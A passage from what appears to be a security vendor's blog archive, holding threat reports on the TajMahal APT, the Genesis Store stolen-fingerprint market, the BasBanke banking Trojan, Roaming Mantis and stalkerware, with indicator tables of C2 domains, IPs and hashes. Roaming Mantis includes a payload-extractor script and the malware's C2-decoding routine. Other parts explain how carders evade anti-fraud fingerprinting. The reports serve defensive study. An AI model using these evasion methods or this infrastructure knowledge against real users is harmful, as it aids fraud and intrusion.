commands to allow programs, then execute a Trojan downloaded from myftp[.]biz Powershell md5 D153FF52AE717D8CF26BEF57BDB7867D Install.ps1 – PowerShell script that invoke a cobalt strike beacon EXE md5 AD1C91BF5E7D1F0AAF2E4EFB8FB79ADE Stage 2 executable (res-vbs) that invokes Pastebin chain EXE md5 EE3AD5B06DBC6CCA7FDC9096697A9B4A Re-vbs – VBS script that uses Pastebin data to create scheduled task and run JScript to invoke RAT EXE md5 805CA34E94DA9615C13D8AF48307FB07 Folder.exe – another RAT variant based on Pastebin chain EXE md5 F330703C07DDD19226A48DEBA4E8AA08 Stage 2 executable (shell-exe) that invokes Pastebin chain EXE md5 CFD2178185C40C9E30AADA7E3F667D4B Another RAT variant based on Pastebin chain EXE md5 C2EE081EC3ADEF4AFACAB1F326EE50FF 2poker2.exe – use PowerShell command to invoke base64 string from Pastebin and create another RAT variant EXE md5 B3A472F81F800B32FE6595F44C9BF63B Stage 1 executable / lure EXE md5 DF3F3AD279CA98F947214FFB3C91C514 Stage 1 executable / lure EXE md5 221EEF8511169C0496BBC79F96E84A4A Stage 1 executable / lure EXE md5 62DF4BC3738BE5AD4892200A1DC6B59A Stage 1 executable / lure EXE md5 55D33D9DA371FDFE7871F2479621444A Stage 1 executable / lure EXE md5 838696872F924D28B08AAAA67388202E Stage 1 executable / lure EXE md5 E8BE9843C372D280A506AC260567BF91 Stage 1 executable / lure EXE md5 55D33D9DA371FDFE7871F2479621444A Stage 1 executable / lure EXE md5 D9DBB65A42FFE0575F0E99F7498A593E Stage 1 executable / lure EXE md5 5DB18AB35D29D44DDA109F49D1B99F38 Stage 1 executable / lure EXE md5 DAE24E4D1DFCDD98F63F7DE861D95182 Stage 1 executable / lure EXE md5 2358DBB85A29167FA66EE6BF1A7271CD Stage 1 executable / lure EXE md5 10DFA690662B9C6DB805B95500FC753D Stage 1 executable / lure EXE md5 6B5946E326488A8C8DA3AAEC2CB6E70F Stage 1 executable / lure EXE md5 342A4D93DF060289B2D8362461875905 Stage 1 executable / lure EXE md5 C9CAE9026EE2034626E4A43CFDD8B192 Stage 1 executable / lure Network dji-msi.2waky.com External C2 domain; rotates with the others over time Network checktest.www1.biz External C2 domain; rotates with the others over time Network fulltest.yourtrap.com External C2 domain; rotates with the others over time Network microsoft10.compress.to External C2 domain; rotates with the others over time Network mmh.ns02.us External C2 domain; rotates with the others over time Network ramliktest.mynetav.org External C2 domain; rotates with the others over time Network testhoward.mysecondarydns.com External C2 domain; rotates with the others over time Network testmace.compress.to External C2 domain; rotates with the others over time Network time-loss.dns05.com External C2 domain; rotates with the others over time Network wiknet.mooo.com External C2 domain; rotates with the others over time Network Wiknet.wikaba.com External C2 domain; rotates with the others over time Network supports.mefound.com External C2 domain; rotates with the others over time Network saso10.myftp.biz External C2 server used by PowerShell scripts to download malware Network External C2 server (most active) Network External C2 server (least active) Network External C2 server (least active) Network External C2 server (least active)
2019. április 10.

Project TajMahal – a sophisticated new APT framework

Executive summary

‘TajMahal’ is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins we’ve ever seen for an APT toolset.

Just to highlight its capabilities, TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue. It can also request to steal a particular file from a previously seen USB stick; next time the USB is connected to the computer, the file will be stolen.

TajMahal has been developed and used for at least the past five years. The first known ‘legit’ sample timestamp is from August 2013, and the last one is from April 2018. The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014.

More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com).

Technical details

We have discovered two different types of TajMahal packages, self-named Tokyo and Yokohama. The targeted systems found by Kaspersky Lab were infected with both packages. This suggests that Tokyo was used as first stage infection, deploying the fully-functional Yokohama package on interesting victims, and then left in for backup purposes. The packages share the same code base, we identified the following interesting features:

  • Capable of stealing documents sent to the printer queue.
  • Data gathered for victim recon includes the backup list for Apple mobile devices.
  • Takes screenshots when recording VoiceIP app audio.
  • Steals written CD images.
  • Capable of stealing files previously seen on removable drives once they are available again.
  • Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies.
  • If deleted from Frontend file or related registry values, it will reappear after reboot with a new name and startup type.

So far we have detected a single victim based on our telemetry – a diplomatic entity from a country in Central Asia.


The TajMahal framework is an intriguing discovery that’s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. The huge amount of plugins that implement a number of features is something we have never before seen in any other APT activity. For example, it has its own indexer, emergency C2s, is capable of stealing specific files from external drives when they become available again, etc.

The question is, why go to all that trouble for just one victim? A likely hypothesis is that there are other victims we haven’t found yet. This theory is reinforced by the fact that we couldn’t see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.

Kaspersky Lab products detect the TajMahal APT samples as HEUR:Trojan.Multi.Chaperone.gen

Appendix I – Indicators of compromise

A full set of IOCs and Yara rules is available to customers of Kaspersky Intelligence Reporting service – contact intelreports@kaspersky.com

Domains and IPs

File Hashes

Appendix II – Additional technical details

The following table provides the full list of files stored in the VFS with a short description describing what the plugins do:

nn Name Short description 00
01 cs64.dll
cs32.dll C2 communication and command processing. WatchPoints document stealer. 02
03 li64.dll
li32.dll LocalInfo. Collects a large amount of information, titled “TAJ MAHAL” 04
06 ad64.dll
ad32.dll AudioRecorder. Microphone, Voice IP applications. 07
08 le64.dll
le32.dll Open source-based LAME mp3 encoder (“Mar 27 2014”) used by AudioRecorder plugins (adXX.dll). 09 dd.m MP3 file is sent by AudioRecorder (adXX.dll) when cache is cleared. 10
11 me64.dll
me32.dll AudioRecorder for Windows Metro applications.
Injects ma32.dll into “wwahost.exe” or “audacity.exe”. 12 ma32.dll AudioRecorder for Windows COM.
Hooks IAudioClient, IAudioRenderClient, IMMDevice. 13
14 ams_api64.dll
ams_api32.dll Handy wrapper around API of exXX.dll, pdXX.dll, sgXX.dll. 15
16 ex64.dll
ex32.dll Orchestrator. Update/install/uninstall, selects target processes and loads plugins. 17
18 fe64.dll
fe32.dll Template of “Yokohama” Frontend module; is used for reinstalling. 19
20 pd64.dll
pd32.dll Provides API to access configuration settings, working files, egress queue. 21
22 libpng64.dll
libpng32.dll Open source “libpng” library version 1.5.8 (February 1, 2012). Used by Screenshoter plugin (ssXX.dll). 23
24 rs64.dll
rs32.dll Reinstaller/Injector. 25
26 ix32.dll
ix64.dll LoadLibrary call template dll is used by Reinstaller/Injector plugin (rsXX.dll) for injecting LoadLibrary call into running processes. 05
28 obj32.bin
obj64.bin Shellcode template is used by Reinstaller/Injector (rsXX.dll) and AudioRecorder4MetroApp (meXX.dll) for injecting into running processes. Both versions of “obj32.bin” are the same; it seems to be stored twice by mistake. 29
30 sc64.dll
sc32.dll Utility library. Provides API for cryptography, file, registry, memory management operations and so on. 31
32 sg64.dll
sg32.dll Library for managing egress queue (files and messages prepared to send to CC). 33
34 st64.dll
st32.dll SuicideWatcher. Watches uninstall time, checks time diff (local time vs internet time). 35
36 zip64.dll
zip32.dll Open source “XZip/XUnzip” library by Info-Zip + Lucian Wischik + Hans Dietrich. Is used by Indexer (inXX.dll) and C2 communication (csXX.dll) plugins. 37
38 zlib64.dll
zlib32.dll Open source “zlib” version 1.2.3 used by libpngXX.dll for compressing screenshots (ssXX.dll). 39 il32.dll IM-Stealer. Steals conversation content from chat windows of instant messaging applications. 40
55 in32.dll
in64.dll Indexer. Indexes files on victim drives, user profiles, removable drives.
Built index files are zipped (by zipXX.dll) and put in send queue. 41
56 isys9core_64.dll
isys9_64.dll Proprietary “ISYS Search Software” components are used by Indexer plugin.
Licensee_ID1 “Q5GXU H5W67 23B4W SCQFD 4G7HV 9GSLW”
Licensee_ID2 “objectviewer.exe” 45
54 sqlite3_64.dll
sqlite3_32.dll Open source “sqlite” library. Used by “ISYS Search”. 57
58 tn32.dll
tn64.dll Thumbnailer. Makes and prepares to send thumbnails of found picture files. 59
62 freeimage_32.dll
freeimageplus_64.dll FreeImage open source library supports popular graphics image formats (ver 3.15.4 2012-10-27) (http://freeimage.sourceforge.net). Is used by Thumbnailer (tnXX.dll) plugin. 63
64 ku64.dll
ku32.dll Keylogger & clipboard monitor. 65
66 pm64.dll
pm32.dll Steals printed documents from spooler queue.
This is done by enabling the “KeepPrintedJobs” attribute for each configured printer stored in Windows Registry:
key: “SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers”
value: “Attributes” 67
68 rc64.dll
rc32.dll EgressSender. Sends files from output queue to C2. 69
70 rn64.dll
rn32.dll Daily “ClientRecon” (ComputerName, OS information, MacAddress, WirelessNetwork keys, connected Apple devices, Apple mobile devices backups list, IE version, SecurityCenterInfo (AV, Firewalls and AntiSpyware products), Hardware info, Installed soft including Metro Apps, Users, Autoruns).
Check and send to C2 if something changed. 71
72 ss64.dll
ss32.dll Screenshoter. Periodic low resolution screenshots. High resolution screenshots of specified process windows and when recording VoiceIP application audio. See “ss_pr” & “ss_wt_nm” cfg vars. 73
74 vm32.dll
vm64.dll Steal documents from fixed and removable drives. Watch CDBurnArea and steals written CD images. 75
76 wc64.dll
wc32.dll Periodically makes webcamera snapshots. 77 default.cfg Default configuration settings file. 78 runin.bin List of processes names and associated plugins should be run inside these processes. 79 morph.dat Configuration file stores path of work folders and registry keys.
2019. április 9.

Digital Doppelgangers

Carding exists for over 20 years. And it is not dead yet. It is alive, and even more – it is being actively developed by cybercriminals. The “good” old method of entering stolen credit card information into online store forms to buy goods and services or using online payment system accounts for the same purpose still works like a charm. Of course, the process has become more sophisticated, and it is certainly not so easy to do as it used to be 10 years ago, but unfortunately it is still possible.

The modern financial cyberfrauds, sophisticated targeted attacks on banks like Carbanak and Silence, hundreds of families of banking Trojans, etc. It had all started with carding forums many years ago. Carding is the cradle of modern financial cybercrime. As before, bank cards, payment systems and online banking frauds are the most valuable criminal sources of wealth.

A study by Juniper Research estimates that losses from online payment frauds will reach 43 billion USD by 2023, up from 22 billion USD in 2018, making anti-fraud and cybersecurity measures a top concern for the industry. And this is not surprising – every day cybercriminals develop new methods and tools to bypass anti-fraud protection systems, they develop malware to help them in their activities, create services and stores, discuss ways to defeat protection mechanisms on Darknet forums and channels. From the famous Cardingplanet forum to Darknet stolen card stores – financial cybercrime schemes were not dead at all during all these years. They have evolved and become more dangerous than ever.

Digital fingerprint protection

How do modern anti-fraud systems protect users from online fraud? They employ various models and combinations of multiple technical and analytical methods. But in simple terms, any anti-fraud system must identify a fraudster and block his attempt to accomplish an illegal transaction involving a bank card or payment system account. To identify fraudsters and separate them from legitimate buyers the anti-fraud system uses various mechanisms designed to verify the user’s digital identity mask, and if it knows this mask to be legitimate or the mask is a new and unique one, it will not throw the “red flag”. As a result, the user behind the mask is recognized to be a legitimate one, and his query, such as an attempt to make a purchase using the provided bank card details, will be approved. If the user’s digital identity appears suspicious, the transaction will be canceled or put on hold for an additional manual check. Additional authentication typically includes a request to provide extended information like bank card expiry date or CVV number, or possibly also a verification call from the online store or payment system operator for voice verification.

As such, the user’s digital identity is a digital fingerprint – a combination of system attributes that are unique to each device and personal behavioral attributes of the user himself. The first part, the device fingerprint, includes:

  • IP address (external and local)
  • Screen information (screen resolution, window size)
  • Firmware version
  • Operating system version
  • Browser plugins installed
  • Timezone
  • Device ID
  • Battery information
  • Audio system fingerprint
  • GPU info
  • WebRTC IPs
  • TCP/IP fingerprint
  • Passive SSL/TLS analysis
  • Cookies
  • and many more

The device may have over 100 attributes used for browsing.

The second part of the digital identity is the behavioral analysis. Modern anti-fraud solutions analyze the user’s social network accounts (third-party cookies check) and various aspects of his/her behavior, including:

  • Time spent at online store website
  • Clicks on website location
  • Interest-related behavior (items of interest, typical amount of money spent, digital or real merchandise, etc.)
  • Mouse/touchscreen behavior
  • System configuration changes

The anti-fraud system may “red flag” various tricks, but the main idea is to make sure that the user’s collected digital identity had been used for transactions before, such transactions had been legitimate, or that the digital fingerprint is completely unique and used for the first time. This is why, if a cybercriminal uses the same machine for multiple attempts to buy from the same online shore using different bank cards details or stolen payment system login/password pairs, such illegal transactions will be declined. Anti-fraud systems can check the user’s collected fingerprint against the local database of fraudster device fingerprint patterns and, if any of them should match the one being used for the online purchase attempt, the transaction will be immediately blocked.

Fingerprint example

But the bad guys are always looking for ways to defeat the anti-fraud safeguards. They do in-depth research work to find out how anti-fraud systems work, they analyze browser traffic using different local analysis proxy tools to understand protection system scripts and queries. They study the information gathered from devices to create unique digital fingerprints of its users.

The next thing they do is try to substitute the system’s real fingerprint with the fake one. They try to manipulate queries and supply unique values in response to every query from the anti-fraud mechanism. Or, as a more advanced alternative, they substitute the requested values with the already existing ones – stolen from someone else’s PC.

Genesis Store

Cybercriminals soon became aware that unique fingerprints from users’ PCs make valuable information useful to many of their own kind. They began devising malware to steal fingerprints from users’ machines and selling such fingerprints along with other stolen data from the same machines, including user accounts, logins, passwords and browser cookies collected from various online services – from stores and payment systems to bank accounts. With our cybercrime threat intelligence technologies we were able to identify and analyze the biggest marketplace for this kind of data – the Genesis Store.

Genesis Store is an online cybercriminal invitation-based private market for stolen digital fingerprints. At the moment it offers more than 60k+ stolen bot profiles. The profiles include: browser fingerprints, website user logins and passwords, cookies, credit card information. The price varies from 5 to 200 dollars per profile – it heavily depends on the value of the stolen information. For example, if the bot has a login/password pair from an online bank account, the price is higher. As the marketplace owners have explained in their Darknet forum thread, the price is calculated automatically using a unique algorithm.

Genesis Store homepage

Bots for sale

Genesis Store has a configurable search panel that allows searching for specific bots. Logins and passwords from a particular website, the victim’s country, operating system, date the profile first appeared at the market – everything is searchable.

Genesis search panel

Genesis Store owners want to make the use of stolen profiles as easy as possible, so they have developed a special .crx plugin for Chromium-based browsers. The plugin allows installing stolen digital profiles into the cybercriminal’s own browser with a single mouse click for him to become a doppelganger of the victim. After that the bad guy only needs to connect to a proxy server with an IP address from the victim’s location and he can bypass the anti-fraud systems’ verification mechanisms, pretending to be a legitimate user.

Genesis plugin

Fingerprint settings in Genesis plugin

For the customers who don’t want to buy real fingerprints, there is also an option to generate unique ones. Genesis Store gives its customers an opportunity to use Genesis algorithms and the plugin to generate random fingerprints that can be used, for example, to enter stolen bank card information into online store forms: such unique browser fingerprints will be properly configured, so the anti-fraud system will not be alarmed.

Genesis fingerprint generator

The dark sphere

Another tool widely used to bypass anti-fraud systems is the Tenebris Linken Sphere browser. Its developers position it as the perfect browser for anonymity, and in fact it has been used for carding for years. Unlike the Genesis plugin, Sphere is a fully functional browser with advanced fingerprint configuration capabilities, automatic proxy server validity testing and usage options, etc. It even features a user activity emulator – cybercriminals can program it to open the desired websites, follow links, stay on websites for a given length of time, etc. Simply put, to trick the anti-fraud systems’ behavior analysis modules. The Tenebris Linken Sphere developers have also created a marketplace of unique fingerprints that can be used with Sphere browsers.

Tenebris website

Unlike Genesis, Sphere uses a subscription-based licensing system. One month’s worth of the browser usage costs 100$. With the fingerprints market access thrown in, the price is 500$ per month.

Tenebris Sphere licenses

Sphere has much deeper fingerprint configuration options for generated fingerprints. Most of the parameters are fully adjustable for an opportunity to create exactly the fingerprint one needs to mimic a real user.

Configuration panel

Configuration panel



Antifraud systems are rapidly developing. They introduce new protection mechanisms to fend off fraudsters, while fraudsters develops new tools to break through the protection layers. The sums of money lost to carding attacks are huge, and cybercriminals are most certain to scale up these malicious activities.

The security departments of financial organizations must always look for ways to counter such threats. Extra two-factor authentication for any transaction initiated using a bank card or payment system is an absolute necessity these days, even if the user’s digital profile appears legit to the protection system. Even though it is not very convenient for users to complete the extra authentication routine each time they want to buy online, it is the most effective safeguard against carding attacks for the present.

In addition, new user behavior analysis methods must be developed and implemented together with custom fingerprinting technologies that may include hardware-based fingerprint collection arrangements operating on a deeper level than currently available. Additional biometric authentication should be considered as well.

Kaspersky Lab continuously researches financial cybercrime to provide timely protection against the hostile activities.

2019. április 4.

BasBanke: Trend-setting Brazilian banking Trojan

BasBanke is a new Android malware family targeting Brazilian users. It is a banking Trojan built to steal financial data such as credentials and credit/debit card numbers, but not limited to this functionality. The propagation of this threat began during the 2018 Brazilian elections, registering over 10,000 installations to April 2019 from the official Google Play Store alone.

This malware can perform tasks such as keystroke logging, screen recording, SMS interception, and the theft of credit card and financial information. To trick users into downloading the malware, the authors advertise it via Facebook and WhatsApp messages. Campaign’s new URLs redirect victims either to the official Google Play Store or to a website hosting malicious APK packages.

Malicious applications used to distribute BasBanke, hosted in the Google Play Store.

The malicious applications hosted in Google Play Store disguise themselves as applications with supposed functionality such as a secure QR reader, a fake app for a real travel agency with travel deals, and – implementing a well-known trick – as an application to “see who visited your profile.” The most widespread malicious application is a fake version of CleanDroid, first announced in a paid advertisement on Facebook, and linking to the application hosted on the Play Store. This “miraculous” application promises to protect the victim’s device against viruses, to optimize memory space, and to save data when using a 3G or 4G connection. In reality it is a banking Trojan.

The malicious CleanDroid application shown in a Facebook advertisement. Source: Defesa Digital

The number of targeted banking applications and websites is quite significant. A considerable number of Brazilian financial institutions and other popular websites such as Spotify, YouTube, and Netflix are on the target list. However, when it comes to stealing banking credentials, metadata such as the device name, IMEI, and the telephone number used by the victim are sent to a remote C2. Why pay special attention to this data? Well, fraudsters need it to mimic legitimate access to the account of the victim.

Metadata extracted from the phone and sent to the remote C2.

Depending on the version of the malware, we found different targets – and they are all financial institutions. In addition, an extensive list of keywords defines what other brands or websites will trigger the keylogging procedure.

We have previously found a few malicious campaigns similar to this but with significantly reduced distribution when compared to BasBanke. Another difference is that BasBanke uses Facebook and WhatsApp as a mass distribution vector. Also, it appears to have sparked new ideas among Brazilian cybercriminal crews, by showing how easy it is to infect an Android device with a malicious application hosted in the official store. The attackers behind BasBanke have proved that the Play Protect feature is not enough to stop them and effectively block their malware. In fact, Basbanke is the forerunner of a larger malicious campaign that we’ll be reporting on soon.

Reference IoC



Interested in more information? Email us at financialintel@kaspersky.com

2019. április 3.

Roaming Mantis, part IV

One year has passed since we published the first blogpost about the Roaming Mantis campaign on securelist.com, and this February we detected new activities by the group. This blogpost is follow up on our earlier reporting about the group with updates on their tools and tactics.

Mobile config for Apple phishing

Our key finding is that the actor continues to seek ways to compromise iOS devices and has even built a new landing page for iOS users. When an iPhone user visits this landing page, she sees pop-up messages guiding her to the malicious iOS mobile config installation:

Pop-up messages and mobile config installation

After installation of this mobile config, the phishing site automatically opens in a web browser and collected information from the device is sent to the attacker’s server. This information includes DEVICE_PRODUCT, DEVICE_VERSION, UDID, ICCID, IMEI and MEID.

XML and CA in mobile config

The CA contains the suspected developer’s email address, “zeeyf79797@yahoo.co[.]jp”, which could be malicious.

We created a test account for this research and used the account credentials at the phishing site. As soon as the threat actor received the ID and password, the criminals attempted to log in to the account from Hong Kong. After entering the credentials, we were directed to the next page, which tried to steal the two-factor authentication code (PIN) sent to the device.

Phishing page for stealing apple ID and two-factor authentication

Re-spreading the updated sagawa.apk Type A (MoqHao/XLoader)

On the Android front, our telemetry data shows a new wave of malicious APK files which we detect as “Trojan-Dropper.AndroidOS.Wroba.g”.

sagawa.apk Type A has spread since Feb 26

We have analyzed the malicious APK file and confirmed that it is definitely a variant of sagawa.apk Type A malware, also known as MoqHao (Mcafee) and XLoader (TrendMicro). Type A malware was earlier distributed via SMS in Japan.

We also found out that the threat actors had compromised routers to overwrite DNS settings and discovered that the following two features were updated as well:

  • Decryption algorithm for encrypted payload in Trojan-Dropper module
  • Stored destination and accounts for getting real C2
Decryption algorithm for encrypted payload in Trojan-Dropper module

Compared to the previous version, the Trojan-Dropper’s decryption function has been altered slightly (change highlighted in purple):

Added 4-byte skip from encrypted data in decompiled code

Why did the attackers change it? Well, the simplified Python script for extracting encrypted payload was disclosed in our previous blog posts. We are suspecting that the actor considered this and introduced some minor changes to their decryption algorithm to evade detection by security products and researchers.

However, we have updated the simplified Python script according to this change:

  • sagawa.apk_typeA_payload_extractor_1.01.py
  • #!/usr/bin/env python import sys import zlib import base64 data = open(sys.argv[1],"rb").read() dec_z = zlib.decompress(data[4:]) # open.skip(4); dec_b = base64.b64decode(dec_z) with open(sys.argv[1]+".dec","wb") as fp: fp.write(dec_b) Stored destination and accounts for getting real C2

    In the previous campaign, the three accounts “haoxingfu11”, “haoxingfu22” and “haoxingfu33” on @outlook.com were stored inside the samples for the purpose of retrieving the C2 server address. In order to fetch the C2 server address, the email service was used the real C2 destination was delivered to the victims in an encrypted form from the email subject. In the new version the actor has switched their tactics for retrieving the C2 address from email service to fetching it from Twitter.

    “https://twitter.com/%s” is stored in the malware

    The three suspected Twitter accounts were easily found as well, because the sample had the account IDs stored together, separated by the “|” character just like the old samples:

    Three account IDs separated by the “|” character

    The decryption algorithm for the real C2 address remained untouched – the malware connects to the extracted real C2 via web socket. In addition to the three accounts mentioned earlier, we found several other accounts:

    • lucky88755
    • lucky98745
    • lucky876543
    • gyugyu87418490
    • luckyone1232
    • sadwqewqeqw

    The decryption algorithm for extracting the real C2 from Chinese characters is the same as in the previous sample, so our scripts from the old blogpost will still work. All the accounts are related to the same IP, although the port numbers are different. The table below shows these changes as derived from the account “@luckyone1232”.

    Datetime (UTC) Encrypted data Decrypted real C2 February 25 2019 11:30 傘傠傘偠傈傠偠傠傐傸偘储傀傐僨傀僨僸傸傀 114.43.155[.]227:28855 February 26 2019 08:00 傀傸傸偠傠傠傠偘傘储偘傰傠僠僨傀僨僸傸傀 220.136.47[.]169:28855 March 02 2019 01:00 傀傸傸偠傠傠傠偘傘僘偘傰傈傐僨傀僨僸傸傀 220.136.49[.]137:28855 March 05 2019 06:00 傀傸傸偠傠傠傠偘傠僘偘傰僀傸僸僐傀傐 220.136.39[.]1:28855 March 07 2019 03:00 傘傠僸偠傠傈僐偘傰傈储偈傀傰傈僀傸僸僐傀傐 118.168.130[.]236:28855 March 09 2019 10:00 傠傠偈傀傰傸偠傸傰傐偘储傀僨僨傀僨僸傸傀 61.230.210[.]228:28855 March 13 2019 01:00 傘傸傐偠傸储储偘傰储傈偈傈傀僨傀僨僸傸傀 125.227.174[.]35:28855 March 21 2019 01:00 傘偘傰傠僠偈傀储傠偠傈僸僀傸僸僐傀傐 1.169.203[.]48:28855

    We also noticed that the threat actor has introduced a new backdoor command “getPhoneState”. The following table shows the comparison of the older and newer versions of the malware:

    Date August 08 2018 March 03 2019 MD5 956f32a28d0057805c7234d6a13aa99b 651b6888b3f419fc1aac535921535324 File size 427.3 KB (437556 bytes) 396.0 KB (405504 bytes) Malware type sagawa.apk Type A
    MoqHao (McAfee)
    XLoader (TrendMicro) sagawa.apk Type A
    MoqHao (McAfee)
    XLoader (TrendMicro) Encrypted payload (enc_data) \assets\a \assets\bin Decryption algorithm for payload payload = base64.b64decode(zlib.decompress(enc_data)); payload = base64.b64decode(zlib.decompress(enc_data[4:])); Backdoor commands sendSms
    ping sendSms
    getPhoneState Stored destination @outlook.com (email) https://twitter.com/%s (SNS) Accounts haoxingfu11
    haoxingfu33 luckyone1232
    gyugyu87418490 RegExp abcd <title>abcd([\\u4e00-\\u9fa5]+?) “; Decryption algorithm for real C2 for i in range(len(ext)):
    dec = dec + chr((ord(ext[i]) – 0x4e00) >> 3 ^ ord(‘beg'[j]))
    j = (j+1) %3 for i in range(len(ext)):
    dec = dec + chr((ord(ext[i]) – 0x4e00) >> 3 ^ ord(‘beg'[j]))
    j = (j+1) %3 Rogue DNS settings in compromised routers again

    In late February 2019, we detected a URL query of a malicious DNS changer. Here is an example:

    URL query of malicious DNS changer

    The router’s DNS setting is potentially compromised if the device reads the URL query of the DNS changer from localnet under a router with the following conditions:

  1. No authentication for router panel from localnet
  2. The device has an admin session for the router panel
  3. Simple ID and password (or default) for route panel like admin:admin

As we have observed, several hundred routers have been compromised and all pointed to the rogue DNS IPs.

This code overwrites the rogue DNS IPs below into the DNS settings of routers:

  • 171.244.33[.]114
  • 171.244.33[.]116
Geographical expansion

According to our detection data, new variants of sagawa.apk Type A (Trojan-Dropper.AndroidOS.Wroba.g) have been detected in the wild, based on our KSN data from February 25, 2019 to March 20, 2019.

Geographical expansion from KSN data

The worst affected countries are Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran and Vietnam. Our products detected this malware over 6,800 times for over 950 unique users during this period. We believe this attack wave has a much bigger scale and these numbers reflect only a small part of this campaign.


We have seen increased distribution of sagawa.apk Type A since late February 2019. This wave is characterized by a new attack method of phishing with malicious mobile config, although the previously observed DNS manipulation is also still actively used. We find the use of malicious mobile config especially alarming as this may cause serious problems for the users. As explained in an earlier blog post, “the profile could configure the device to use a malicious proxy or VPN, effectively allowing the attacker to monitor everything.”

We recommend users take the following steps:

  • Change the default ID and password, and apply the relevant security patches to counter these threats;
  • For Android users: do not download APKs from third-party sources;
  • For iOS users: do not install a non-trusted third-party mobile config.

For further information about this threat actor, please refer to our previous blog posts about Roaming mantis:

Kaspersky Lab products detect this malware for Android as:

  • HEUR:Trojan-Banker.AndroidOS.Wroba
  • HEUR:Trojan-Dropper.AndroidOS.Wroba

Finally, we would like to show our appreciation to the Japanese researchers @ninoseki and @papa_anniekey, who have shared and discussed with us their results of Roaming Mantis campaign research. The criminals are still rapidly improving their methods: we discovered some updated sagawa.apk Type A this April, the fresh sample has embedded DES algorithm instead of some decryption feature. We’re going to track Roaming Mantis activity and publish any new activities in the future.

Indicators of compromise (IoCs) examples Malicious hosts: 114.43.155[.]227 real C2 220.136.47[.]169 real C2 220.136.49[.]137 real C2 220.136.39[.]1 real C2 118.168.130[.]236 real C2 171.244.33[.]114 RogueDNS 171.244.33[.]116 RogueDNS 61.230.153[.]211 Landing page 154.223.62[.]130 Landing page ffakecg[.]com Landing page sagawa-mwm[.]com Landing page sagawa-mqd[.]com Landing page sagawa-bz[.]com Landing page nttdocomo-qae[.]com Landing page nttdocomo-qat[.]com Landing page Suspicious Twitter accounts:
  • luckyone1232
  • sadwqewqeqw
  • gyugyu87418490
  • lucky88755
  • lucky98745
  • lucky876543
sagawa.apk Type A and its modules: 417a6af1172042986f602cc0e2e681dc APK file 651b6888b3f419fc1aac535921535324 APK file 0a4e8d3fe5ee383ba3a22d0f00670ce3 APK file 870697ddb36a8f205478c2338d7e6bc7 APK file 7e247800b95c643a3c9d4a320b12726b \classes.dex 7cfb9ed812e0250bfcb4022c567771ec \classes.dex 8358d2a39d412edbd1cf662e0d8a9f19 \classes.dex 7cfb9ed812e0250bfcb4022c567771ec \classes.dex af2890a472b85d473faee501337564a9 Decrypted dex file c8d7475a27fb7d669ec3787fe3e9c031 Decrypted dex file d0848d71a14e0f07c6e64bf84c30ee39 Decrypted dex file e2b557721902bc97382d268f1785e085 Decrypted dex file
2019. április 3.

Beware of stalkerware

Spyware might sound like a concept from a Hollywood movie, yet commercial versions of such programs – known in the cybersecurity industry as ‘stalkerware’ – are a daily reality for many people. For the price of just a few dollars, consumer spyware programs allow users to spy on their current or former partners, and even strangers. This can be done by simply installing an app on the targeted victim’s smartphone or tablet. Once this has happened, the stalker is granted access to a range of personal data: from the victim’s location and SMS, to social media messages and live feeds from their device camera or microphone.

From observing stalkerware program functionality, it can be seen that there are very few differences between commercial spyware (detected and defined by most security software as ‘not-a-virus’) and classic spying malware. For example, a consumer surveillance program works like this:

  • The command and control server (C2) is provided by the service owners
  • It is easy to buy and deploy than spying malware. There is no need to use shady hacking forums and have programming skills – in almost all cases it requires a simple manual installation

Stalkerware programs have been exposed and publicly criticized multiple times, yet in most countries their status remains vague, while some brands market their programs as child-tracking software. However these programs should not be confused with legal parental control software and ‘find my phone’ apps, despite an overlap in functionality. Firstly, they are distributed through dedicated landing pages – a direct violation of Google Play safety recommendations. Secondly, these apps have functionality that allows them to invade the privacy of an individual without their consent or knowledge: the application icon can be hidden from the applications menu, while the app continues to run in the background, and some functions of the app fulfil surveillance tasks (such as recording the victim’s voice). Some even delete traces of their presence from the phone, along with any installed security solutions once the attacker manually grants the application with root-access.

We detect such programs as ‘not-a-virus:Monitor’ and have been keeping a close eye on them. Two years ago, we published our first overview and continued to monitor such threats. We have now decided to conduct further research to check how stalkerware is being used and determine the most prominent features of the latest consumer surveillance programs.

We examined applications for mobile platforms, with a particular focus on Android, because it is the most popular OS that stalkerware is implemented on. For attackers to perform extended exfiltration activities on iOS devices, the devices need to be jailbroken first.

All in all, 2018 saw 58,487 users who had a stalkerware application installed on their phones or tablets. That is a moderate number compared to other types of threats. For example, during the same period, the number of users who encountered ransomware was 187,321. However, it should be noted that when it comes to malware, our figures show how many people we were able to protect from infection. But when we look at stalkerware, the situation is a bit different.

Out of the 58,487 on whose devices we detected stalkerware apps, approximately 35,000 had these apps installed on their devices before they implemented Kaspersky Lab products and the first security scan was performed. This could mean they were unaware of presence of such software on their device.

In total, in 2018 we identified 26,619 unique samples of stalkerware programs.

The following statistics reveal the most detected stalkerware applications based on the number of unique users of Kaspersky Lab for Android mobile products:

The most often detected stalkerware apps by the number of targeted users, 2018

Apart from these applications, we have also chosen a number of other programs that we’ve been monitoring manually for a while.

After having them analyzed, we found some important features that, when put together, paint a clear picture of how stalkerware is now used, and we have listed six reasons to stay as far away from these applications as possible.

Their distribution methods pose a threat

Due to their aggressive nature, stalkerware programs can’t be found or listed in the App Store or on Google Play. In most cases, however, they can be found after a quick internet search, and downloaded from dedicated landing pages. Of course, these programs are urging users to enable the installation of applications hosted outside of Google Play, which can often put devices at risk. Enabling applications that cannot be found on Google Play makes an Android device vulnerable to malware and goes against Google’s security policies.

The programs are being advertised through online banners. Cybercriminals also use ‘Black Hat SEO‘ techniques, to ensure the website supporting the program is moved up the search engine ranking and appears at the top of search results pages.

